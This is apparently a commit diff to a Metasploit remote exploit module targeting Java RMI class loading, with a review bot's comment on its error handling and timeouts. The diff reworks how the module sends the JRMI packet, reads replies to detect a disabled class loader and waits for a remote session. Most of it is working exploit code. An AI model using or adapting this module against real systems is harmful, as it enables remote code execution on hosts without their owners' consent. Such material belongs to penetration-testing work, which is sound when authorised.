Smarter RMI class loader logic
parent
4c2e1c2859
commit
ec831a1658
|
@ -106,10 +106,26 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
# write out minimal header and packet
|
# write out minimal header and packet
|
||||||
print_status("Connected and sending request for #{new_url}")
|
print_status("Connected and sending request for #{new_url}")
|
||||||
#sock.put("JRMI" + [2].pack("n") + "K" + [0].pack("n") + [0].pack("N") + packet);
|
#sock.put("JRMI" + [2].pack("n") + "K" + [0].pack("n") + [0].pack("N") + packet);
|
||||||
sock.put("JRMI" + [2,0x4b,0,0].pack("nCnN") + packet);
|
sock.put("JRMI" + [2,0x4b,0,0].pack("nCnN") + packet)
|
||||||
|
|
||||||
# wait for the request to be handled
|
buf = ""
|
||||||
while not session_created?
|
1.upto(6) do
|
||||||
|
res = sock.get_once(-1, 5) rescue nil
|
||||||
|
break if not res
|
||||||
|
break if session_created?
|
||||||
|
buf << res
|
||||||
|
end
|
||||||
|
|
||||||
|
if buf =~ /RMI class loader disabled/
|
||||||
|
print_error("Not exploitable: the RMI class loader is disabled")
|
||||||
|
return
|
||||||
|
end
|
||||||
|
|
||||||
|
print_good("Target #{rhost}:#{rport} may be exploitable...")
|
||||||
|
|
||||||
|
# Wait for the request to be handled
|
||||||
|
1.upto(80) do
|
||||||
|
break if session_created?
|
||||||
select(nil, nil, nil, 0.25)
|
select(nil, nil, nil, 0.25)
|
||||||
handler()
|
handler()
|
||||||
end
|
end
|
||||||
|
|
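Review bot: The inline modifier in `res = sock.get_once(-1, 5) rescue nil` hides every StandardError, so a reset or closed connection looks the same as an idle read, and with `buf` still empty the code falls through to `print_good("Target #{rhost}:#{rport} may be exploitable...")` although nothing was received from the service. Rescuing only the socket errors you expect and reporting the empty case on its own, for example `print_status("No response from #{rhost}:#{rport}, result is inconclusive") if buf.empty?`, would keep the output from overstating what was observed. The bounds `1.upto(6)` with a 5-second read and `1.upto(80)` with a 0.25-second sleep also deserve a one-line comment stating the totals (roughly 30 s and 20 s), since the replaced `while not session_created?` loop had no limit. The enclosing method starts and ends outside this hunk.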